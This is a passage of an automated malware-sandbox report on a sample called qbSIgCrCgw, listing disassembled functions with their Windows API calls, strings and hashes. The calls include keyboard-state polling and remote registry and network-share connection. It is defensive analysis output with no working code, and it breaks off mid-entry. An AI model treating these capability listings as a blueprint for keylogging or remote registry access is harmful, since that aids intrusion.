                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 2889450990-2391861430
                                                                                • Opcode ID: e641154cec3bd2e0467ffd27a0429c2e8fb81c233228ab0608027821b06ea2a1
                                                                                • Instruction ID: 7bf32f8c2165129f408dea6217a6c9253fbc65b4ba1d12168c03d7c832e44d1e
                                                                                • Opcode Fuzzy Hash: e641154cec3bd2e0467ffd27a0429c2e8fb81c233228ab0608027821b06ea2a1
                                                                                • Instruction Fuzzy Hash: F851AD7290014DBACF16EBE4DE42EEEB778AF04304F100066F6057A5A2EB346F58DB61
                                                                                Function 003FCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString__swprintf_wprintf
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 2889450990-3420473620
                                                                                • Opcode ID: c271e65eadb2624aea18ba66a2bfcf3cd70c5b5546e888f35ba17814267fa26a
                                                                                • Instruction ID: c4d5fcefe0ef13ce390ebe0061e651de113932a1414dc83128d22c65f8958b4a
                                                                                • Opcode Fuzzy Hash: c271e65eadb2624aea18ba66a2bfcf3cd70c5b5546e888f35ba17814267fa26a
                                                                                • Instruction Fuzzy Hash: 5651AE72900149BACF26EBE4DE42EEEB778AF04344F100066F605764A2EB746F59DF61
                                                                                Function 00413C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00412BB5,?,?), ref: 00413C1D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: $EF$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 3964851224-3104496615
                                                                                • Opcode ID: 3f50943c6e2c34fde972eb5cd12c6fc55f4b29856f9d9cb5b87cba21d73d3644
                                                                                • Instruction ID: f287bac6fc14d5b45b03cdb129059cd8a538e5b9d3575f1c56ee4bf735614d17
                                                                                • Opcode Fuzzy Hash: 3f50943c6e2c34fde972eb5cd12c6fc55f4b29856f9d9cb5b87cba21d73d3644
                                                                                • Instruction Fuzzy Hash: 2741A43010024A9BDF01EF10E852AEB3365FF52301F50885AFC565F2A2EB78EE4ACB15
                                                                                Function 003F55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003F55D7
                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003F5664
                                                                                • GetMenuItemCount.USER32(00471708), ref: 003F56ED
                                                                                • DeleteMenu.USER32(00471708,00000005,00000000,000000F5,?,?), ref: 003F577D
                                                                                • DeleteMenu.USER32(00471708,00000004,00000000), ref: 003F5785
                                                                                • DeleteMenu.USER32(00471708,00000006,00000000), ref: 003F578D
                                                                                • DeleteMenu.USER32(00471708,00000003,00000000), ref: 003F5795
                                                                                • GetMenuItemCount.USER32(00471708), ref: 003F579D
                                                                                • SetMenuItemInfoW.USER32(00471708,00000004,00000000,00000030), ref: 003F57D3
                                                                                • GetCursorPos.USER32(?), ref: 003F57DD
                                                                                • SetForegroundWindow.USER32(00000000), ref: 003F57E6
                                                                                • TrackPopupMenuEx.USER32(00471708,00000000,?,00000000,00000000,00000000), ref: 003F57F9
                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003F5805
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 3993528054-0
                                                                                • Opcode ID: 183b095b9ef5aceee841bbe420d245bac4ed487d3eac41c78b7b5ca766ce0249
                                                                                • Instruction ID: 375b6319aa8ae21e86ab4dded1dd61092f50c27b38762313a48b6534f75a17ca
                                                                                • Opcode Fuzzy Hash: 183b095b9ef5aceee841bbe420d245bac4ed487d3eac41c78b7b5ca766ce0249
                                                                                • Instruction Fuzzy Hash: BA71D370641A0DBEEB229B54DC89FBABF65FF00368F244215F729AA2E1C7715810DB94
                                                                                Function 003EA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003EA1DC
                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003EA211
                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003EA22D
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003EA249
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 003EA273
                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 003EA29B
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003EA2A6
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003EA2AB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                • API String ID: 1687751970-22481851
                                                                                • Opcode ID: 8d446a71d3a0952fedc6f426c332a371290e81c87ceab10906672e8a5ff1a286
                                                                                • Instruction ID: 18c4f482a83bdd645e27e6a3284ca5baa8a480652a57d0af2a3a88accc0fa03c
                                                                                • Opcode Fuzzy Hash: 8d446a71d3a0952fedc6f426c332a371290e81c87ceab10906672e8a5ff1a286
                                                                                • Instruction Fuzzy Hash: F741F776C10629ABCF26EFA4DC85DEDB778BF04704F01452AE911B71A1EB74AE05CB50
                                                                                Function 003F67E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __swprintf.LIBCMT ref: 003F67FD
                                                                                • __swprintf.LIBCMT ref: 003F680A
                                                                                  • Part of subcall function 003D172B: __woutput_l.LIBCMT ref: 003D1784
                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 003F6834
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 003F6840
                                                                                • LockResource.KERNEL32(00000000), ref: 003F684D
                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 003F686D
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 003F687F
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 003F688E
                                                                                • LockResource.KERNEL32(?), ref: 003F689A
                                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003F68F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                • String ID: 5F
                                                                                • API String ID: 1433390588-3653218959
                                                                                • Opcode ID: c44f22a0607a8b1b22e410fe225f088365f0ff84e59558a2b05424db2680c3e2
                                                                                • Instruction ID: 830b8ea12eace129533cbadc7ee303d675f9a8712e774a6f52d302f9badffc39
                                                                                • Opcode Fuzzy Hash: c44f22a0607a8b1b22e410fe225f088365f0ff84e59558a2b05424db2680c3e2
                                                                                • Instruction Fuzzy Hash: 8C31727190025AABDB129FA0ED46EBF7BACFF08381F008429FA16D6150E734D951DB64
                                                                                Function 003F25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004236F4,00000010,?,Bad directive syntax error,0044DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003F25D6
                                                                                • LoadStringW.USER32(00000000,?,004236F4,00000010), ref: 003F25DD
                                                                                • _wprintf.LIBCMT ref: 003F2610
                                                                                • __swprintf.LIBCMT ref: 003F2632
                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003F26A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                • API String ID: 1080873982-4153970271
                                                                                • Opcode ID: 2ce3fddee4297369a6ac78e5dd07455a5c75c993932bfcaa6a623f2c8a2d619f
                                                                                • Instruction ID: d679290d801b7f7c89eca276dc486cdb42f2a3eb4c19b3ace14e9184e066da66
                                                                                • Opcode Fuzzy Hash: 2ce3fddee4297369a6ac78e5dd07455a5c75c993932bfcaa6a623f2c8a2d619f
                                                                                • Instruction Fuzzy Hash: E6215E3290021EFFCF12AF90DC4AFEE7739BF18708F040466F6156A1A2EA75A614DB55
                                                                                Function 003F7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003F7B42
                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003F7B58
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003F7B69
                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003F7B7B
                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003F7B8C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: SendString
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 890592661-1007645807
                                                                                • Opcode ID: 7a5b29209b9bb7d3499fdf7270fc474ea5addaf74d3e080435784efeef658fa8
                                                                                • Instruction ID: e67c508de74308e366a9cce1cdcbe1cd50176a5766a79ba31165557bba821323
                                                                                • Opcode Fuzzy Hash: 7a5b29209b9bb7d3499fdf7270fc474ea5addaf74d3e080435784efeef658fa8
                                                                                • Instruction Fuzzy Hash: 8C1104A0A5029D79D721BB61CC4AEFFBB7CEBD2B05F10041AB511A60C1EEA00E45C5B1
                                                                                Function 003F778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 003F7794
                                                                                  • Part of subcall function 003CDC38: timeGetTime.WINMM(?,76C1B400,004258AB), ref: 003CDC3C
                                                                                • Sleep.KERNEL32(0000000A), ref: 003F77C0
                                                                                • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003F77E4
                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 003F7806
                                                                                • SetActiveWindow.USER32 ref: 003F7825
                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003F7833
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 003F7852
                                                                                • Sleep.KERNEL32(000000FA), ref: 003F785D
                                                                                • IsWindow.USER32 ref: 003F7869
                                                                                • EndDialog.USER32(00000000), ref: 003F787A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                • String ID: BUTTON
                                                                                • API String ID: 1194449130-3405671355
                                                                                • Opcode ID: 7c1516040415c1660af59e6397dc5f1162f6b168fda6fc9686275f9822bc10ee
                                                                                • Instruction ID: ad328fe11ba9ae09fa9d9cb7fb524886e4f715be47633e7693d6b924f1f9de7a
                                                                                • Opcode Fuzzy Hash: 7c1516040415c1660af59e6397dc5f1162f6b168fda6fc9686275f9822bc10ee
                                                                                • Instruction Fuzzy Hash: 65214270604209AFE7125F20EC89B363F6AFB44346F001434FA09861B2DB719D54EB29
                                                                                Function 004002EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • CoInitialize.OLE32(00000000), ref: 0040034B
                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004003DE
                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 004003F2
                                                                                • CoCreateInstance.OLE32(0043DA8C,00000000,00000001,00463CF8,?), ref: 0040043E
                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004004AD
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 00400505
                                                                                • _memset.LIBCMT ref: 00400542
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040057E
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004005A1
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004005A8
                                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004005DF
                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 004005E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                • String ID:
                                                                                • API String ID: 1246142700-0
                                                                                • Opcode ID: a8dd4a00ada15ab8a1a35e3be5e64acaef7b89c290dcec4ab4c64838b48e888c
                                                                                • Instruction ID: d0430385b8fa0884578a81f65cfa6fb62451f0476d7a60a7bbf3b6a5c6bce2b3
                                                                                • Opcode Fuzzy Hash: a8dd4a00ada15ab8a1a35e3be5e64acaef7b89c290dcec4ab4c64838b48e888c
                                                                                • Instruction Fuzzy Hash: 58B1EA75A00208AFDB15DFA4C889EAEBBB9FF48304F14846AF905EB251DB34ED41CB54
                                                                                Function 003F2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 003F2ED6
                                                                                • SetKeyboardState.USER32(?), ref: 003F2F41
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 003F2F61
                                                                                • GetKeyState.USER32(000000A0), ref: 003F2F78
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 003F2FA7
                                                                                • GetKeyState.USER32(000000A1), ref: 003F2FB8
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 003F2FE4
                                                                                • GetKeyState.USER32(00000011), ref: 003F2FF2
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 003F301B
                                                                                • GetKeyState.USER32(00000012), ref: 003F3029
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 003F3052
                                                                                • GetKeyState.USER32(0000005B), ref: 003F3060
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 76896e48e8487ee1bc4d1a55d354cdc7006111491c0046abe7b8701c51a2e401
                                                                                • Instruction ID: 174d92d2669a51755b7897441b231e043e35813ae0218ab9274b92f0b37d35d2
                                                                                • Opcode Fuzzy Hash: 76896e48e8487ee1bc4d1a55d354cdc7006111491c0046abe7b8701c51a2e401
                                                                                • Instruction Fuzzy Hash: 4151C760A0478C69FB37DBA488107FBBBB49F11340F09459ED7C25A1C2DA549B8CC762
                                                                                Function 003EED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000001), ref: 003EED1E
                                                                                • GetWindowRect.USER32(00000000,?), ref: 003EED30
                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003EED8E
                                                                                • GetDlgItem.USER32(?,00000002), ref: 003EED99
                                                                                • GetWindowRect.USER32(00000000,?), ref: 003EEDAB
                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003EEE01
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 003EEE0F
                                                                                • GetWindowRect.USER32(00000000,?), ref: 003EEE20
                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003EEE63
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 003EEE71
                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003EEE8E
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 003EEE9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                • String ID:
                                                                                • API String ID: 3096461208-0
                                                                                • Opcode ID: 2c65c3f2fcda7073c1b659da5df0c50f2fa00c0c6d9eaf4fea4b2d41eb8f4002
                                                                                • Instruction ID: d77a7e2536c514c39afb48d1db70e02f21fa30d2ef0b42c15d37a6fce131cc7f
                                                                                • Opcode Fuzzy Hash: 2c65c3f2fcda7073c1b659da5df0c50f2fa00c0c6d9eaf4fea4b2d41eb8f4002
                                                                                • Instruction Fuzzy Hash: 76510FB1B00605AFDB19CF69DD86AAEBBBAFB88701F158239F519D72D0D7709D008B14
                                                                                Function 003CB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003CB759,?,00000000,?,?,?,?,003CB72B,00000000,?), ref: 003CBA58
                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,003CB72B), ref: 003CB7F6
                                                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,003CB72B,00000000,?,?,003CB2EF,?,?), ref: 003CB88D
                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0042D8A6
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003CB72B,00000000,?,?,003CB2EF,?,?), ref: 0042D8D7
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003CB72B,00000000,?,?,003CB2EF,?,?), ref: 0042D8EE
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003CB72B,00000000,?,?,003CB2EF,?,?), ref: 0042D90A
                                                                                • DeleteObject.GDI32(00000000), ref: 0042D91C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 641708696-0
                                                                                • Opcode ID: e1299f5efd3da8ac088c51584275d90e72782280497559df1d9f18b39d8cd7d9
                                                                                • Instruction ID: 3f2c2c4cf1f6e09cd23ffd2941bc68f3251c51cd9b8285251bcc04fbaf9b8f68
                                                                                • Opcode Fuzzy Hash: e1299f5efd3da8ac088c51584275d90e72782280497559df1d9f18b39d8cd7d9
                                                                                • Instruction Fuzzy Hash: 67616C30901710DFDB269F18E98AB26B7B5FF94715F15452EE48686A70C774ACD0CB88
                                                                                Function 003CB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB526: GetWindowLongW.USER32(?,000000EB), ref: 003CB537
                                                                                • GetSysColor.USER32(0000000F), ref: 003CB438
                                                                                Memory Dump Source
